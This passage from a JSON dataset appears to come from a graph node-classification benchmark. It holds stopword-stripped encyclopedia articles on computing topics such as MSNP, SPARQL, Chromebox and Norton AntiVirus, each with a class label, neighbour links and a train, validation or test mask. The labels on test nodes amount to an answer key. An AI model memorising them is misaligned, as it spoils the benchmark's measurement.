      10409,
      8554,
      6797,
      692,
      10965,
      823,
      1304,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 6627,
    "label": 1,
    "text": "ADSO:adso application development system online adso tool used expedite writing testing modular applications using idms databases activities flow-of-control processing data storage definition data verification editing error handling terminal input output menu creation menu display specified using series screens instead conventional detailed code adso ads/o ads originally cullinet product later company acquired computer associates ads/o three components adsg adsa adsr tools used along ads/o develop ads/o application adso used develop online batch applications",
    "neighbors": [
      3816,
      7188,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 6628,
    "label": 5,
    "text": "Microsoft_Notification_Protocol:microsoft notification protocol microsoft notification protocol msnp also known mobile status notification protocol instant messaging protocol developed microsoft use microsoft messenger service instant messaging clients connect skype since 2014 earlier windows live messenger msn messenger windows messenger microsoft messenger mac third-party clients pidgin trillian also communicate using protocol msnp first used publicly available product first release msn messenger 1999 major change made protocol new command syntax changes results version-number incremented one format msnp october 2003 microsoft started blocking access messenger service using versions msnp8 starting september 11 2007 microsoft forces current users msn messenger upgrade windows live messenger 8.1 due security considerations msnp1 never public believed used early stages design development msn messenger 1 pre-release version made available developers 1999 internet draft however production version differed published version subtle ways msnp2 msnp3 supported msn messenger 2.0 msnp3 4 5 supported messenger servers july 2000 used msn messenger 3.0 4.0 msnp6 used later versions msn messenger 4.x 2002 msn messenger 5.0 used msnp7 msnp8 introduced different authentication method sending authorization microsoft passport secure servers returning challenge string minimum version protocol accepted .net messenger service microsoft blocked earlier versions security reasons old obsolete clients unable sign forcing users upgrade clients version 5.0 msn messenger one uses msnp version windows messenger uses msnp8 standard version including 4.7 latest 5.1 protocol supports windows messenger-to-windows messenger webcam voice capabilities msnp9 introduced msn messenger 6 adding support type data messages used transferring display pictures custom emoticons clients frame-by-frame web cam rather traditional stream like windows media player wmv format improved voice system well improved nat traversal file transfers employed msn messenger 6.1 microsoft started blocking earlier versions october 2003 however big overhaul obvious change integration hotmail address books employed msn messenger 7.0 employed msn messenger 7.5 employed windows live messenger 8.0 msnp13 features lot changes notably contact list synchronization removed clients must instead send soap request contacts server also known client goes abch abch stands address book clearing house address book service behind msn windows live services client must send contacts data server send presence information msnp14 adds yahoo messenger interoperability msnp15 protocol version introduced windows live messenger 8.1 2006-09-08 based msnp14 uses different authentication mechanism called rps relying party suite twn tweener authentication used protocol versions 14 sso single sign-on rps authentication used protocol versions 15 addition new authentication mechanism microsoft also planning making properties user roaming user display picture future personal status messages wherever user signs furthermore support user locations added personal status message although feature later removed windows live messenger 8.1 client msnp16 used pre-release version windows live messenger 9.0 leaked december 2007 features multiple points presence mpop ability sign 2 places time chats replicated places uux data extended contain endpoint data also mpop well signature sound msn object data msnp17 identified windows live messenger servers messenger.hotmail.com unused official client released microsoft msnp18 used windows live messenger 2009 14.0 main new addition groups feature much like persistent grouped conversations uux data extended include scene image msn object data employed windows live messenger 2011 wave 4 employed windows live messenger 2012 employed skype since early 2014",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      4746,
      1036,
      5647,
      11408,
      3610,
      3228,
      10271,
      3105,
      9511,
      1962,
      9519,
      8758,
      1467,
      6208,
      1218,
      6982,
      6855,
      2760,
      1738,
      2892,
      6993,
      3284,
      4318,
      4704,
      3812,
      4068,
      9572,
      10486,
      3959,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 6629,
    "label": 8,
    "text": "SPARQL:sparql sparql pronounced sparkle recursive acronym sparql protocol rdf query language rdf query language—that semantic query language databases—able retrieve manipulate data stored resource description framework rdf format made standard rdf data access working group dawg world wide web consortium recognized one key technologies semantic web 15 january 2008 sparql 1.0 became official w3c recommendation sparql 1.1 march 2013 sparql allows query consist triple patterns conjunctions disjunctions optional patterns implementations multiple programming languages exist exist tools allow one connect semi-automatically construct sparql query sparql endpoint example viziquer addition exist tools translate sparql queries query languages example sql xquery sparql allows users write queries loosely called key-value data specifically data follow rdf specification w3c thus entire database set subject-predicate-object triples analogous nosql databases usage term document-key-value mongodb sql relational database terms rdf data also considered table three columns – subject column predicate column object column subject rdf analogous entity sql database data elements fields given business object placed multiple columns sometimes spread across one table identified unique key rdf fields instead represented separate predicate/object rows sharing subject often unique key predicate analogous column name object actual data unlike relational databases object column heterogeneous per-cell data type usually implied specified ontology predicate value also unlike sql rdf multiple entries per predicate instance one could multiple child entries single person return collections objects like children thus sparql provides full set analytic query operations codice_1 codice_2 codice_3 data whose schema intrinsically part data rather requiring separate schema definition however schema information ontology often provided externally allow joining different datasets unambiguously addition sparql provides specific graph traversal syntax data thought graph example demonstrates simple query leverages ontology definition codice_4 friend friend specifically following query returns names emails every person dataset query joins together triples matching subject type predicate codice_5 person codice_6 person one names codice_7 mailboxes codice_8 author query chose reference subject using variable name codice_9 readable clarity since first element triple always subject author could easily used variable name codice_10 codice_11 whatever name chosen must line query signify query engine join triples subject result join set rows – codice_9 codice_13 codice_14 query returns codice_13 codice_14 codice_9 often complex uri rather human-friendly string note codice_9 may multiple mailboxes returned set codice_13 row may appear multiple times mailbox query distributed multiple sparql endpoints services accept sparql queries return results computed results gathered procedure known federated query whether federated manner locally additional triple definitions query could allow joins different subject types automobiles allow simple queries example return list names emails people drive automobiles high fuel efficiency case queries read data database sparql language specifies four different query variations different purposes query forms takes codice_24 block restrict query although case codice_23 query codice_24 optional sparql 1.1 specifies language updating database several new query forms another sparql query example models question country capitals africa variables indicated codice_27 codice_28 prefix bindings codice_29 codice_30 returned triple ends semicolon subject triple implicitly complete following pair entire triple example codice_31 short codice_32 sparql query processor search sets triples match four triple patterns binding variables query corresponding parts triple important note property orientation class matches conducted solely class-attributes properties – see duck typing make queries concise sparql allows definition prefixes base uris fashion similar turtle query prefix codice_33 stands “ nowiki http //example.com/exampleontology /nowiki ” geosparql defines filter functions geographic information system gis queries using well-understood ogc standards gml wkt etc. sparul another extension sparql enables rdf store updated declarative query language adding codice_34 codice_35 methods open source reference sparql implementations see list sparql implementations comprehensive coverage including triplestore apis storages implemented sparql standard",
    "neighbors": [
      5632,
      9345,
      11650,
      8451,
      2948,
      8070,
      7943,
      140,
      396,
      6161,
      5907,
      8979,
      10004,
      151,
      11674,
      2972,
      10910,
      7455,
      4768,
      6433,
      9248,
      9631,
      9893,
      6775,
      10791,
      10413,
      53,
      6330,
      10938,
      4797,
      574,
      5830,
      6470,
      8262,
      5449,
      9286,
      9290,
      8788,
      2901,
      9941,
      10452,
      4058,
      987,
      8923,
      11098,
      479,
      3171,
      9828,
      4713,
      11625,
      3052,
      4847,
      10611,
      4213,
      502,
      119,
      2296,
      10486,
      6651,
      124,
      3454
    ],
    "mask": "Train"
  },
  {
    "node_id": 6630,
    "label": 1,
    "text": "SQLSTATE:sqlstate programs calling database accords sql standard receive indication success failure call return code called sqlstate consists 5 byte divided two parts first second byte contains class following three subclass class belongs one four categories denotes success class 00 w denotes warning class 01 n denotes data class 02 x denotes exception classes following table lists standard-conforming values based table last column shows part standard defines row empty definition origins part 2 foundation",
    "neighbors": [
      10413
    ],
    "mask": "None"
  },
  {
    "node_id": 6631,
    "label": 9,
    "text": "Visual_Objects:visual objects visual objects object-oriented computer programming language used create computer programs operate primarily windows although used general-purpose programming tool almost exclusively used create database programs original visual objects project code-named aspen started part nantucket attempts bring clipper language windows move procedural object-oriented style also converted clipper p-code system true native compiler introduced elements c language typed variables including windows extensions com odbc later ado symbol datatype offers ability form name-based linkages may used connect menu events object methods form direct linkages server columns controls windows version finally brought market computer associates unfortunately released market-ready almost head-to-head competition first release borland delphi product language still use however last release grafx software 2012 version 2.8 sp4 version number 2838 grafx announced new versions would released next incarnation visual objects language vulcan.net written grafx scratch visual objects compatible true cls compliant .net language taking full advantage .net framework",
    "neighbors": [
      6112,
      8868,
      4614,
      2183,
      8262,
      10921,
      3435,
      6797,
      2929,
      2903,
      2045,
      5374
    ],
    "mask": "None"
  },
  {
    "node_id": 6632,
    "label": 7,
    "text": "Chromebox:chromebox chromebox small form-factor pc running google chrome os operating system device debuted may 2012 chromeboxes like chrome os devices including chromebook laptops primarily support web applications thereby relying heavily internet connection software functionality data storage connection via local area network wireless ethernet port machines classed small form-factor pcs typically feature power switch set connections support keyboard pointing device one monitors solid state drives used storage wireless printers supported first chromebox released samsung may 29 2012 ran dual-core intel celeron processor 867 1.3 ghz featured six usb 2.0 ports two displayport++ slots compatible hdmi dvi vga february 2014 google bundled intel core i7 chromebox business video conferencing package 1080p high definition camera module external microphone/speaker remote control chromebox meetings system retailed 999 plus 250 annual management fee waived first year—a cost thousands dollars less unified videoconferencing systems including cisco polycom system employed google hangouts-like interface 15 participants dedicated url sharing screens management accounts scheduling meetings updated system announced november 2017 featured 4k camera machine learning feature automatically identifies frames participants march 2014 asus established new price low-end chromebox market compact 1.32 pound model retailed 179 featured celeron cpu four usb 3.0 ports yahoo tech columnist david pogue called asus device among smallest least-expensive desktop computers ever sold likening smart car ’ hauling lumber home depot ’ terrific deal—and days ’ get want go may asus released faster model intel core i3 processor hewlett-packard entered market june chromebox powered intel celeron processor optionally bundling keyboard mouse august acer introduced two models could stand vertically provided business-oriented features including encryption fast deletion local data september dell entered market entry-level machine well dell implementation google video conferencing system august 2015 aopen announced family chromeboxes designed principally driving content digital commercial signage models ruggedized on-site operation capability run android apps chrome os devices introduced google 2016 realized certain chromebooks 2017 seemed bypass chromeboxes cluster new chromebox offerings appeared 2018 including acer asus hp oregon-based ctl compute teach learn maker chromebooks since 2014 launched first chromebox march 2018",
    "neighbors": [
      4096,
      4623,
      3600,
      8719,
      7700,
      9244,
      8735,
      9766,
      5159,
      10284,
      3121,
      3633,
      4683,
      11343,
      3664,
      7248,
      8285,
      2658,
      4194,
      5732,
      8821,
      2170,
      7816,
      4236,
      10893,
      5262,
      6800,
      11408,
      10393,
      8858,
      7841,
      6307,
      1203,
      7352,
      7359,
      4289,
      196,
      3269,
      3782,
      1224,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      3819,
      236,
      9970,
      7926,
      3836,
      253,
      8446,
      5892,
      8455,
      5384,
      2328,
      4377,
      8986,
      10009,
      10525,
      798,
      288,
      4901,
      6444,
      8495,
      5431,
      2875,
      10045,
      11590,
      8520,
      11592,
      4429,
      9039,
      3409,
      1362,
      9057,
      10090,
      5483,
      8044,
      1400,
      5499,
      7548,
      11646,
      1409,
      4995,
      9610,
      911,
      1935,
      8592,
      5522,
      1427,
      5524,
      2965,
      10645,
      1435,
      2978,
      1959,
      3499,
      7595,
      11184,
      2496,
      4044,
      4048,
      9682,
      467,
      5100,
      7660,
      9712
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6633,
    "label": 9,
    "text": "Temporary_variable:temporary variable computer programming temporary variable variable short lifetime usually hold data soon discarded placed permanent memory location short-lived usually declared local variable i.e. variable local scope formal definition makes variable temporary often-used term programming typical example would swapping contents two variables swap contents variables b one would typically use temporary variable temp follows preserve data overwritten b temporary variables usually named identifiers abbreviate word temporary temp tmp simply common metasyntactic variable names common foo bar baz see also foobar computer hardware designed exploit behaviour temporary data cache register file may contain temporaries internally microprocessor never need committed main memory hence consuming external memory bandwidth",
    "neighbors": [
      5059,
      7523,
      3175,
      1193,
      10510,
      655,
      52,
      11125,
      407,
      2936,
      7193,
      11487
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6634,
    "label": 2,
    "text": "Reconstructor:reconstructor reconstructor program allows anyone customize iso image ubuntu variants kubuntu xubuntu website longer functioning",
    "neighbors": [
      8554,
      9902,
      7983,
      5618,
      823,
      985
    ],
    "mask": "Test"
  },
  {
    "node_id": 6635,
    "label": 4,
    "text": "AdultSwine:adultswine adultswine malware discovered 2018 check point software technologies malware found programmed around 60 apps google play store primarily aimed children bug would display pornographic ads clicked would instruct victims download malicious software attempt steal personal data estimated 3 7 million users may infected according representative google apps removed play store developer accounts associated apps locked check point cautions users extra vigilant installing apps particularly intended use children ”",
    "neighbors": [
      3858,
      7515,
      8668,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6636,
    "label": 4,
    "text": "HDIV:hdiv hdiv web application security framework controls information flow server client avoiding many important web risks hdiv extends web applications behaviour adding security functionalities maintaining api framework specification implies hdiv may used applications developed spring mvc grails jstl struts 1 struts 2 javaserver faces symfony transparent way programmer without adding complexity application development",
    "neighbors": [
      899,
      4198,
      2470,
      3560,
      6219,
      3341,
      9293,
      5404,
      10526
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6637,
    "label": 6,
    "text": "NTFS_volume_mount_point:ntfs volume mount point ntfs volume mount points specialized ntfs filesystem objects used mount provide entry point volumes mount points created directory ntfs file system gives reference root directory mounted volume empty directory converted mount point mounted volume limited ntfs filesystem formatted file system supported microsoft windows volume mount points supported ntfs 3.0 introduced windows 2000 though quite similar regular posix mount points found unix unix-like systems support local filesystems windows vista later ntfs symbolic links used link local directories remote smb network paths symbolic links work boot impossible redirect e.g nevertheless possible redirect",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      7244,
      4173,
      4174,
      10828,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      9972,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      11568,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      5969,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6638,
    "label": 3,
    "text": "Aleph_kernel:aleph kernel aleph discontinued operating system kernel developed university rochester part rig project 1975 aleph early set road creation first practical microkernel operating system mach aleph used inter-process communications move data programs kernel applications could transparently access resources machine local area network time 3-mbit/s experimental xerox ethernet project eventually petered several years due rapid changes computer hardware market ideas led creation accent carnegie mellon university leading turn mach applications written rig system communicated via ports ports essentially message queues maintained aleph kernel identified machine unique opposed globally unique id consisting process id port id pair processes automatically assigned process number pid startup could ask kernel open ports processes could open several ports read automatically blocking allowing programs run data arrived processes could also shadow another receiving copy every message sent one shadowing similarly programs could interpose another receiving messages essentially cutting original message conversation rig implemented number data general eclipse minicomputers ports implemented using memory buffers limited 2 kb size produced significant overhead copying large amounts data another problem realized retrospect use global id allowed malicious software guess ports thereby gain access resources since ids based program id port ids changed program restarted making difficult write servers clients could rely specific port number service",
    "neighbors": [
      8633,
      7561,
      7187,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6639,
    "label": 3,
    "text": "Instruction_cycle:instruction cycle instruction cycle also known fetch–decode–execute cycle simply fetch-execute cycle cycle central processing unit cpu follows boot-up computer shut order process instructions composed three main stages fetch stage decode stage execute stage simpler cpus instruction cycle executed sequentially instruction processed next one started modern cpus instruction cycles instead executed concurrently often parallel instruction pipeline next instruction starts processed previous instruction finished possible cycle broken separate steps program counter pc special register holds memory address next instruction executed fetch stage address stored pc copied memory address register mar pc incremented order point memory address next instruction executed cpu takes instruction memory address described mar copies memory data register mdr mdr also acts two-way register holds data fetched memory data waiting stored memory also known memory buffer register mbr eventually instruction mdr copied current instruction register cir acts temporary holding ground instruction fetched memory decode stage control unit cu decode instruction cir cu sends signals components within cpu arithmetic logic unit alu floating point unit fpu alu performs arithmetic operations addition subtraction also multiplication via repeated addition division via repeated subtraction also performs logic operations binary shifts well fpu reserved performing floating-point operations computer cpu different cycles based different instruction sets similar following cycle cycle begins soon power applied system initial pc value predefined system architecture instance intel ia-32 cpus predefined pc value codice_1 typically address points set instructions read-only memory rom begins process loading booting operating system fetch step instruction control unit fetches instruction address memory unit decoding process allows cpu determine instruction performed cpu tell many operands needs fetch order perform instruction opcode fetched memory decoded next steps moved appropriate registers decoding done cpu control unit step evaluates type operation performed memory operation computer checks whether direct indirect memory operation i/o register instruction computer checks type executes instruction function instruction performed instruction involves arithmetic logic alu utilized stage instruction cycle useful perspective end user everything else overhead required make execute step happen",
    "neighbors": [
      7173,
      9224,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      3157,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      11395,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      2811,
      8700,
      5380,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      7983,
      309,
      2358,
      8501,
      5948,
      4928,
      8514,
      5956,
      4423,
      6476,
      7505,
      9044,
      9557,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      6541,
      398,
      3470,
      5518,
      8590,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      5073,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      4078,
      10734,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 6640,
    "label": 9,
    "text": "Compatibility_of_C_and_C++:compatibility c c++ c c++ programming languages closely related many significant differences c++ began fork early pre-standardized c designed mostly source-and-link compatible c compilers time due development tools two languages ides compilers often integrated single product programmer able specify c c++ source language however c subset c++ consequently c programs compile c++ code without modification likewise c++ introduces many features available c practice almost code written c++ conforming c code article however focuses differences cause conforming c code ill-formed c++ code conforming/well-formed languages behave differently c c++ bjarne stroustrup creator c++ suggested incompatibilities c c++ reduced much possible order maximize inter-operability two languages others argued since c c++ two different languages compatibility useful vital according camp efforts reduce incompatibility hinder attempts improve language isolation official rationale 1999 c standard c99 endorse nowiki /nowiki principle maintaining largest common subset c c++ maintaining distinction allowing evolve separately stated authors content let c++ big ambitious language several additions c99 supported current c++ standard conflicted c++ features variable-length arrays native complex number types codice_1 type qualifier hand c99 reduced incompatibilities compared c89 incorporating c++ features codice_2 comments mixed declarations code c++ enforces stricter typing rules implicit violations static type system initialization requirements compile-time enforcement in-scope variables initialization subverted c valid c code disallowed c++ rationale provided annex c.1 iso c++ standard though c++ favors c99 c11 added several additional features c incorporated standard c++ complex numbers variable length arrays note complex numbers variable length arrays designated optional extensions c11 flexible array members restrict keyword array parameter qualifiers compound literals designated initializers c++ adds numerous additional keywords support new features renders c code using keywords identifiers invalid c++ example syntactical constructs valid c c++ produce different results two languages several differences previous section also exploited create code compiles languages behaves differently example following function return different values c c++ due c requiring codice_15 front structure tags codice_60 refers variable c++ allowing omitted codice_60 refers implicit codice_62 beware outcome different codice_44 declaration placed inside function presence identifier name function scope inhibits implicit codice_62 take effect c++ outcome c c++ would observe also ambiguity example due use parenthesis codice_65 operator using codice_66 would expect codice_67 expression type thus example would compile c++ c c++ maintain large degree source compatibility object files respective compilers produce important differences manifest intermixing c c++ code notably reasons c++ code call c function codice_68 c++ code must prototype codice_68 codice_70 likewise c code call c++ function codice_71 c++ code codice_71 must declared codice_70 common practice header files maintain c c++ compatibility make declaration codice_70 scope header differences c c++ linkage calling conventions also subtle implications code uses function pointers compilers produce non-working code function pointer declared codice_70 points c++ function declared codice_70 example following code using sun microsystems c++ compiler produces following warning codice_77 declared c linkage calling conventions passed c function codice_68",
    "neighbors": [
      1931,
      6414,
      10510,
      6160,
      5521,
      3736,
      1435,
      155,
      10143,
      1952,
      5796,
      2605,
      5165,
      5806,
      9008,
      3765,
      7479,
      10043,
      1724,
      10555,
      10684,
      9665,
      6338,
      963,
      5961,
      1610,
      1611,
      9804,
      4173,
      6349,
      8397,
      11212,
      11219,
      1236,
      5588,
      6102,
      7894,
      4057,
      10586,
      8545,
      4069,
      10470,
      7274,
      1016,
      3577,
      380,
      2045,
      5630
    ],
    "mask": "None"
  },
  {
    "node_id": 6641,
    "label": 2,
    "text": "Enhanced_Write_Filter:enhanced write filter enhanced write filter ewf component windows xp embedded windows embedded standard 7 stores volume changes another medium instead applying original volume ewf allows writes discarded committed original volume later either directly inaction based configuration minimizes writes specified hard disk ewf fbwf file-based write filter become popular enthusiast computing way decreasing wear solid-state drives netbooks carpcs ewf three main operating modes ewf disk ewf ram ewf ram reg mode location ewf volume stores configuration overlay volume stores file changes different ewf disk stores overlay data outside primary disk allowing external disk compactflash used overlay ewf volume stored unpartitioned space disk ewf ram stores overlay data ram ewf volume unpartitioned space disk ewf ram reg ewf ram except ewf volume stored windows registry case appropriation ewf carpcs often based windows xp smaller footprint used similar effect windows vista netbooks diminish write activity enhance lifespan solid state drives due changes windows vista however disk mode used unlike commercial ram disks ewf reclaim ram files deleted ewf ram ewf ram reg mode memory consumed ever increases eventually system free space crash automatic adjustment daylight saving time compatible ewf causing incorrect time settings reboot",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      5681,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      7244,
      4173,
      4174,
      10828,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      8315,
      1150,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      2383,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 6642,
    "label": 8,
    "text": "Webtrekk:webtrekk webtrekk gmbh german company offers marketing analytics customer intelligence software webtrekk companies connect analyze activate user marketing data across devices since 2019 webtrekk part marketing technology service provider mapp webtrekk founded 2004 ceo christian sauer cto norman wahnschaff 2009 webtrekk received €1 million venture capital investment corporate finance partners winners awin-sponsored publisher initiative contest 2012 webtrekk frost sullivan award finally bringing ‘ real time ’ online/digital analytics 2014 webtrekk closed third round financing collecting total €25 million dpe deutsche private equity 2018 webtrekk bronze international stevie award category business competitive intelligence “ cross device tracking tool cross device bridge 2019 webtrekk honored german stevie award gold realtime predictions 2019 webtrekk acquired marketing technology service provider mapp webtrekk provides variety products gain insights data trigger marketing activities products services cross-channel campaign reporting ai-enabled marketing intelligence webtrekk customer analytics suite includes user-centric analytics personalized product recommendations customer intelligence dashboards customer journey tracking tag integration web behavior re-targeting webtrekk data streams enable raw data captured processed streamed real time since acquisition webtrekk mapp consolidate offerings webtrekk ’ customers also access mapp ’ cross-channel marketing cloud consulting support another part webtrekk offering consulting unit works customers specific large-scale projects support team available answer questions functions interface webtrekk products access raw first-party data core component webtrekk products data exported real-time data warehouses bi systems used carry in-depth analyses within customer analytics suite suite customizable dashboard engine enables customers display connected external data sources social media channels crm systems webtrekk 400 customers including flixbus ing mytoys focus industries finance publishing e-commerce products privacy certified german tüv association confirm data privacy security webtrekk ’ data servers located european union housed data centres certified international organization standardization",
    "neighbors": [
      6576,
      1943
    ],
    "mask": "Train"
  },
  {
    "node_id": 6643,
    "label": 4,
    "text": "Norton_AntiVirus:norton antivirus norton antivirus anti-virus anti-malware software product developed distributed symantec corporation since 1991 part norton family computer security products uses signatures heuristics identify viruses features included e-mail spam filtering phishing protection symantec distributes product download box copy oem software norton antivirus norton internet security related product held 61 us retail market share security suites first half 2007 competitors terms market share study include antivirus products ca trend micro kaspersky lab norton antivirus runs microsoft windows linux macos windows 7 support development versions 2006 2008 version 2009 windows 7 supported update already versions 2010 2011 2012 natively support windows 7 without needing update version 12 version fully compatible mac os x lion 2015 series products symantec made changes portfolio briefly discontinued norton antivirus action later reversed introduction norton antivirus basic may 1989 symantec launched symantec antivirus macintosh sam sam 2.0 released march 1990 incorporated technology allowing users easily update sam intercept eliminate new viruses including many n't exist time program release august 1990 symantec acquired peter norton computing peter norton norton company developed various dos utilities including norton utilities include antivirus features symantec continued development acquired technologies technologies marketed name norton tagline symantec norton crossed-arm pose registered u.s. trademark traditionally featured norton product packaging however pose later moved spine packaging eventually dropped altogether early 1991 u.s. computers invaded hundreds foreign virus strains corporate pc infection becoming serious problem symantec norton group launched norton antivirus 1.0 nav pc compatible computers ads product suggested retail 129 featured norton crossed-arm pose wearing pink shirt surgical mask covering nose mouth 1998 version 5.0 update sam renamed norton antivirus nav macintosh product activation introduced norton antivirus 2004 addressing estimated 3.6 million counterfeit norton products sold alphanumeric code generated identify computer configuration ties product key users allowed activate product five times product key spyware adware detection removal introduced 2005 version tagline antispyware edition tagline dropped later releases however norton antivirus 2009 classic include spyware adware detection classic edition marketed alongside norton antivirus 2009 include spyware adware detection existing users 2006 2007 2008 2009 versions upgrade latest 2010 version without buying new subscription upgrading preserve number days left user subscription redesigned main graphical user interface aggregates information central user interface cnet reports norton protection center useful attempts advertise additional products facilitate detection zero-day malware bloodhound disassembles variety programming languages scans code malicious instructions using predefined algorithms internet explorer homepage hijacking protection introduced release well however notably missing search engine hijacking protection cnet highlighted norton antivirus 2006 noticeable impact system performance operating system requirements call windows 2000 service pack 3 windows xp 150 mb free space 300 mhz processor required either operating system 128 mb ram required windows 2000 256 mb required windows xp norton antivirus released september 12 2006 symantec revised norton antivirus goal reducing high system resource utilization windows vista compatibility introduced release well despite 80 code rewritten cnet reports mixed results performance testing windows 2000 compatibility dropped release compatibility 32-bit versions windows vista added release patch symantec hardware requirements vista call 150 mb free space 800 mhz processor 512 mb ram requirements windows xp similarly call 150 mb free space 300 mhz processor 256 mb ram norton antivirus 2008 released august 28 2007 emphasizing malware prevention new features include sonar looks suspicious application behavior release adds real-time exploit protection preventing attackers leveraging common browser application vulnerabilities installed 32-bit versions windows xp service pack 2 300 mb free space 300 mhz processor 256 mb ram required installed 32-bit 64-bit versions windows vista 300 mb free space 800 mhz processor 256 mb ram needed norton antivirus 2009 released september 8 2008 addressing performance issues 300 changes made zero-impact goal.benchmarking conducted passmark software pty ltd highlights 47-second install time 32 second scan time 5 mb memory utilization symantec funded benchmark test provided scripts used benchmark participating antivirus software security status settings displayed single main interface cpu usage monitor displays total cpu utilization norton cpu usage main interface features include norton insight whitelisting technology cuts scanning times mapping known safe files using information online database address malware response times updates delivered every 5 15 minutes however updates tested symantec may cause false positives incorrectly identify files malicious exploit scanner found 2007 2008 versions dropped release installed 32-bit versions windows xp service pack 2 150 mb free space 300 mhz processor 256 mb ram required installed 32-bit 64-bit versions windows vista 150 mb free space 800 mhz processor 512 mb ram required two variations norton antivirus 2009 also marketed symantec gaming edition provides finer control norton downloads updates allows components suite disabled either manually automatically computer enters full-screen mode classic edition find remove adware spyware version 17.0 released september 9 2009 several features updated release including sonar dubbed sonar 2 uses information determine application truly malicious norton insight present users information origins activities performance applications along reputation data new feature codenamed autospy helps users understand norton malware found previous releases removed threats sight quietly warned users potentially confusing users deceived downloading rogue security software much information placed back main window toggle button switches sides symantec also added windows 7 support aside symantec also added norton download insight prevent drive drive downloads symantec briefly discontinued standalone norton antivirus product 2015 instead replacing norton security fbi confirmed active development magic lantern keylogger intended obtain passwords encrypted e-mail documents criminal investigations magic lantern first reported media bob sullivan msnbc 20 november 2001 ted bridis associated press fbi intends deploy magic lantern form e-mail attachment attachment opened installs trojan horse suspect computer activated suspect uses pgp encryption often used increase security sent email messages activated trojan log pgp password allows fbi decrypt user communications symantec major antivirus vendors whitelisted magic lantern trojan rendering antivirus products including norton antivirus incapable detecting concerns around whitelisting include uncertainties magic lantern full surveillance potential whether hackers could subvert redeploy purposes outside law enforcement graham cluley technology consultant sophos said way knowing written fbi even ’ know whether used fbi commandeered third party another reaction came marc maiffret chief technology officer co-founder eeye digital security states customers paying us service protect forms malicious code us law enforcement job make exceptions law enforcement malware tools proponents magic lantern argue technology would allow law enforcement efficiently quickly decrypt time-sensitive messages protected encryption schemes implementing magic lantern require physical access suspect computer unlike carnivore predecessor magic lantern since physical access computer would require court order fbi spokesman paul bresson response question whether magic lantern also needed court order deploy would say like technology projects tools deployed fbi would used pursuant appropriate legal process january 28 2010 symantec anti-virus update marked spotify trojan horse disabling software across millions pcs retail customers report slow indifferent service bugs examples include faulty error message stating current subscriptions expired users received error stating virus protection updated error occurred update software refused allow daily updates though bug reported 2004 corrected 2005 2006 versions another incident occurred may 2007 norton antivirus flagged components pegasus email client malicious rendering program corrupted symantec customer service addressed problem running checklist troubleshooting steps always successful july 25 2006 symantec released faulty update norton antivirus 2006 users users reported onscreen message stating norton antivirus 